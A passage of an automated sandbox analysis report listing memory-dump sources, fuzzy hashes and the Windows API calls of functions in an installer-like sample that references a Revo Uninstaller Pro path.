                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileWrite$Handle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4209713984-0
                                                                                                                                              • Opcode ID: b9e4185db684bce5ad0788cae12713e21e746a12908521df45acb38f7f8d27e0
                                                                                                                                              • Instruction ID: 56190b11dfe16a64fff14abeeb63188a43507891661e5bfe94a75db88b413973
                                                                                                                                              • Opcode Fuzzy Hash: b9e4185db684bce5ad0788cae12713e21e746a12908521df45acb38f7f8d27e0
                                                                                                                                              • Instruction Fuzzy Hash: A3315B711A439AAFDB20AF12CC08BA6B7E8FF59300F60811BF555531D0C774A8E8CBA1
                                                                                                                                              APIs
                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,002E9DFE,?,00000001,00000000,?,?), ref: 002E9F19
                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,002E9DFE,?,00000001,00000000,?,?), ref: 002E9F4C
                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,002E9DFE,?,00000001,00000000,?,?), ref: 002E9F69
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateDirectory$ErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2485089472-0
                                                                                                                                              • Opcode ID: a830c44819049f2f141497bc729475bef64e46b538263943dc2af76602bdd41c
                                                                                                                                              • Instruction ID: 723dbe4ab596d2a1a93cbe3d21b95c14db5dee0cd7674aa44d04e7b27c35e2ee
                                                                                                                                              • Opcode Fuzzy Hash: a830c44819049f2f141497bc729475bef64e46b538263943dc2af76602bdd41c
                                                                                                                                              • Instruction Fuzzy Hash: 8201C0315B42D565DB329F664C05BFA234C9B0A780F844443F905D5452D7A0C9E1CAA6
                                                                                                                                              APIs
                                                                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 002FC8FC
                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002FC915
                                                                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 002FC920
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ObjectSingleWait$MessagePeek
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1965964400-0
                                                                                                                                              • Opcode ID: f85dcd19c242d9bc6d2c0cce88c5e19ea06f020f393ccb33b75966f0127e7fb8
                                                                                                                                              • Instruction ID: 03201fd45ecc96045c347e4a0ae7f78af7d41ce0d51b0c65cb79952302b6df19
                                                                                                                                              • Opcode Fuzzy Hash: f85dcd19c242d9bc6d2c0cce88c5e19ea06f020f393ccb33b75966f0127e7fb8
                                                                                                                                              • Instruction Fuzzy Hash: BCE0483175030C77D7115F50DD8AFE67B5DE71C741F508121FB06990D1D6E158718655
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: H_prolog
                                                                                                                                              • String ID: CMT
                                                                                                                                              • API String ID: 3519838083-2756464174
                                                                                                                                              • Opcode ID: ccc8696c694be7d72a1cdf4ca87cfe14730e231ed7ff7e7afecaaca3fe848bf2
                                                                                                                                              • Instruction ID: 5d8ecafadb4a16aa6303422f8e91189ed0eea2fc4fc6757ffd7cc892dfb5017a
                                                                                                                                              • Opcode Fuzzy Hash: ccc8696c694be7d72a1cdf4ca87cfe14730e231ed7ff7e7afecaaca3fe848bf2
                                                                                                                                              • Instruction Fuzzy Hash: 9B71F571160F859EDB21DF31CC459E7B7E8AF14302F84496EE5DB87142D6316AA8CF10
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 002E1D66
                                                                                                                                                • Part of subcall function 002E399D: __EH_prolog.LIBCMT ref: 002E39A2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: H_prolog
                                                                                                                                              • String ID: CMT
                                                                                                                                              • API String ID: 3519838083-2756464174
                                                                                                                                              • Opcode ID: 67ffd4d99ae800fdd6eee408d69f46396b2a6edb7c2781c3e15f764545834760
                                                                                                                                              • Instruction ID: c3c98ed9ff9a0f09fe2e71f66ce347d60657168065dbbf2db088958b08b0f649
                                                                                                                                              • Opcode Fuzzy Hash: 67ffd4d99ae800fdd6eee408d69f46396b2a6edb7c2781c3e15f764545834760
                                                                                                                                              • Instruction Fuzzy Hash: E22168729541499FCB15EF99C9529EEFBF6EF18300B9000BDE845A7252CB325E60CFA0
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 002F1432: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,?,00000000,?,002EAB7B,?,?,00000000,?,?,?), ref: 002F1484
                                                                                                                                                • Part of subcall function 002F9A8D: SetCurrentDirectoryW.KERNEL32(?,002F9CE4,C:\Program Files\VS Revo Group\Revo Uninstaller Pro,00000000,003285FA,00000006), ref: 002F9A91
                                                                                                                                              • SHFileOperationW.SHELL32(?,?,?,?,?,003285FA,00000006), ref: 002F9D36
                                                                                                                                              Strings
                                                                                                                                              • C:\Program Files\VS Revo Group\Revo Uninstaller Pro, xrefs: 002F9CDA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CompareCurrentDirectoryFileOperationString
                                                                                                                                              • String ID: C:\Program Files\VS Revo Group\Revo Uninstaller Pro
                                                                                                                                              • API String ID: 3543741193-2410753234
                                                                                                                                              • Opcode ID: 25f907b23d4a13bfc1330dd7d35ddc6df76ecd326d94b43f94b55dc2e485b689
                                                                                                                                              • Instruction ID: 72fe59393c46372a1246d6f1f82f813a5e528c5e8bcd8e1a7aaa16281759ec01
                                                                                                                                              • Opcode Fuzzy Hash: 25f907b23d4a13bfc1330dd7d35ddc6df76ecd326d94b43f94b55dc2e485b689
                                                                                                                                              • Instruction Fuzzy Hash: 1E01B571C5021D55CF12ABE4DD0AEEFB3BCAF09340F100465F604E7151EAF4A6A48FA5
                                                                                                                                              APIs
                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 0030282F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: try_get_function
                                                                                                                                              • String ID: FlsAlloc
                                                                                                                                              • API String ID: 2742660187-671089009
                                                                                                                                              • Opcode ID: f909c9e46bc2d2cd75d844cba3daae60a8b8f9f2080ddf18938d7b000d702463
                                                                                                                                              • Instruction ID: 498a2838d2a1dc12e90e8d6bdb34fc06212ce286349973027a5ea35b7e6daab3
                                                                                                                                              • Opcode Fuzzy Hash: f909c9e46bc2d2cd75d844cba3daae60a8b8f9f2080ddf18938d7b000d702463
                                                                                                                                              • Instruction Fuzzy Hash: 83D02E3678232CB3C91732C4AC06AEBBE088B04BB1F020472FF0C25282D8A288B003C1
                                                                                                                                              APIs
                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002FD7D1
                                                                                                                                                • Part of subcall function 002FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002FD5B7
                                                                                                                                                • Part of subcall function 002FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002FD5C8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                              • String ID: @Uxu
                                                                                                                                              • API String ID: 1269201914-397286711
                                                                                                                                              • Opcode ID: 1e8d4b3dc085b325d8f485853ce92d19dea03ae0058c71596309325f0d3e7f75
                                                                                                                                              • Instruction ID: e7c28f55118ecccb4416344c51f08b5cf9af630a1b43ee91f3e35a6b61d39046
                                                                                                                                              • Opcode Fuzzy Hash: 1e8d4b3dc085b325d8f485853ce92d19dea03ae0058c71596309325f0d3e7f75
                                                                                                                                              • Instruction Fuzzy Hash: A7B0128927D108FD310E21806D02CB6831FC2C5F56330C53AF101C4088D4804DD10072
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _memcmp_strlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2682527083-0
                                                                                                                                              • Opcode ID: 3d08641e980d69e625634e8e02d798a51ae55842b5efb60c040b4d7eb3c6c822
                                                                                                                                              • Instruction ID: 4e5bc472ae39c2c5a7bf66b10d306d26fb4060e2c6e7bc39a0586d6e401b5458
                                                                                                                                              • Opcode Fuzzy Hash: 3d08641e980d69e625634e8e02d798a51ae55842b5efb60c040b4d7eb3c6c822
                                                                                                                                              • Instruction Fuzzy Hash: 4C5119B25143496BDB21DE50CC89FDBB3ECAB84340F00093DFA89C7152DA35A664CBA1
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 002E1382
                                                                                                                                                • Part of subcall function 002E5E99: __EH_prolog.LIBCMT ref: 002E5E9E
                                                                                                                                                • Part of subcall function 002EC4CA: __EH_prolog.LIBCMT ref: 002EC4CF
                                                                                                                                                • Part of subcall function 002EC4CA: new.LIBCMT ref: 002EC512
                                                                                                                                                • Part of subcall function 002EC4CA: new.LIBCMT ref: 002EC536
                                                                                                                                              • new.LIBCMT ref: 002E13FA
                                                                                                                                                • Part of subcall function 002EAD1B: __EH_prolog.LIBCMT ref: 002EAD20
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: H_prolog
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                              • Opcode ID: 7bec92257f671c2838faa4471a6fdaf8d2ca3e803846fd63b6fc9c04ed79765d
                                                                                                                                              • Instruction ID: ef1c58959ee2bc370b4135a2ed71d153bc323528631056b695ccbd308cab461a
                                                                                                                                              • Opcode Fuzzy Hash: 7bec92257f671c2838faa4471a6fdaf8d2ca3e803846fd63b6fc9c04ed79765d
                                                                                                                                              • Instruction Fuzzy Hash: 9E4147B0955B449ED724CF7A84859E6FBE5FF18300F90493ED5EE83282CB726564CB21
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 002E1382
                                                                                                                                                • Part of subcall function 002E5E99: __EH_prolog.LIBCMT ref: 002E5E9E
                                                                                                                                                • Part of subcall function 002EC4CA: __EH_prolog.LIBCMT ref: 002EC4CF
                                                                                                                                                • Part of subcall function 002EC4CA: new.LIBCMT ref: 002EC512
                                                                                                                                                • Part of subcall function 002EC4CA: new.LIBCMT ref: 002EC536
                                                                                                                                              • new.LIBCMT ref: 002E13FA
                                                                                                                                                • Part of subcall function 002EAD1B: __EH_prolog.LIBCMT ref: 002EAD20
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: H_prolog
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                              • Opcode ID: 50d664aae946421bfded4ad26035cfd4c1f7ba062ac965e937824ece68de7f3d
                                                                                                                                              • Instruction ID: 6ecc4ede37cfb57402965b1cbf9c2b01935fdb21d8493a6728e6aff42c95846f
                                                                                                                                              • Opcode Fuzzy Hash: 50d664aae946421bfded4ad26035cfd4c1f7ba062ac965e937824ece68de7f3d
                                                                                                                                              • Instruction Fuzzy Hash: 424167B0915B449ED724CF7984859E6FBE5FF18300F80493ED6EE83282CB326564CB21
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00308516: GetLastError.KERNEL32(?,003200E0,00303394,003200E0,?,?,00302E0F,?,?,003200E0), ref: 0030851A
                                                                                                                                                • Part of subcall function 00308516: _free.LIBCMT ref: 0030854D
                                                                                                                                                • Part of subcall function 00308516: SetLastError.KERNEL32(00000000,?,003200E0), ref: 0030858E
                                                                                                                                                • Part of subcall function 00308516: _abort.LIBCMT ref: 00308594
                                                                                                                                                • Part of subcall function 0030A7D1: _abort.LIBCMT ref: 0030A803
                                                                                                                                                • Part of subcall function 0030A7D1: _free.LIBCMT ref: 0030A837
                                                                                                                                                • Part of subcall function 0030A446: GetOEMCP.KERNEL32(00000000,?,?,0030A6CF,?), ref: 0030A471
                                                                                                                                              • _free.LIBCMT ref: 0030A72A
                                                                                                                                              • _free.LIBCMT ref: 0030A760
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _free$ErrorLast_abort
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2991157371-0
                                                                                                                                              • Opcode ID: d874d2225aae97a372b3f66b6a9912e24036a93b33f62c18d3ebc03812bf3489
                                                                                                                                              • Instruction ID: 0d87384631e57600f33a8a5b20a5c0f89606a0dab85f12be003953d8086361aa
                                                                                                                                              • Opcode Fuzzy Hash: d874d2225aae97a372b3f66b6a9912e24036a93b33f62c18d3ebc03812bf3489
                                                                                                                                              • Instruction Fuzzy Hash: 6531E231905704AFDB12EFA8E861BADB7F4EF41760F268099E5049F2E1EB719E40CB51
                                                                                                                                              APIs
                                                                                                                                              • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,002E9BF3,?,?,002E76AC), ref: 002E95B0
                                                                                                                                              • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,002E9BF3,?,?,002E76AC), ref: 002E95E5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                              • Opcode ID: c5372fd7a1a913dc32b57891e0b0078e5ff5b828cb619bca706aab43afd36f9e
                                                                                                                                              • Instruction ID: 6c82a8e01493bce4985b671ad6421f34463bbad8de91e3168fe48498fab44202
                                                                                                                                              • Opcode Fuzzy Hash: c5372fd7a1a913dc32b57891e0b0078e5ff5b828cb619bca706aab43afd36f9e
                                                                                                                                              • Instruction Fuzzy Hash: D32128B1454389AFE7318F15C845BA777ECEB49364F80492EF5D5821D1C374AC988A60
                                                                                                                                              APIs
                                                                                                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,002E738C,?,?,?), ref: 002E9A98
                                                                                                                                              • SetFileTime.KERNEL32(?,?,?,?), ref: 002E9B48
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$BuffersFlushTime
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1392018926-0
                                                                                                                                              • Opcode ID: 96e26c38e44a0180c69b6efe91b436e4b735a73dfd695ba2ff440caaf337b27f
                                                                                                                                              • Instruction ID: 3f263901edcf7036813681d4c747e9703510ad976d406d830d7f0176dd788d8d
                                                                                                                                              • Opcode Fuzzy Hash: 96e26c38e44a0180c69b6efe91b436e4b735a73dfd695ba2ff440caaf337b27f
                                                                                                                                              • Instruction Fuzzy Hash: 5721D6312A82C6AFC711DF26D491AABBBD8AF55304F44492EB8C1C7241D725DD98CBA1
                                                                                                                                              APIs
                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 002E9B8D
                                                                                                                                              • GetLastError.KERNEL32 ref: 002E9B99
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
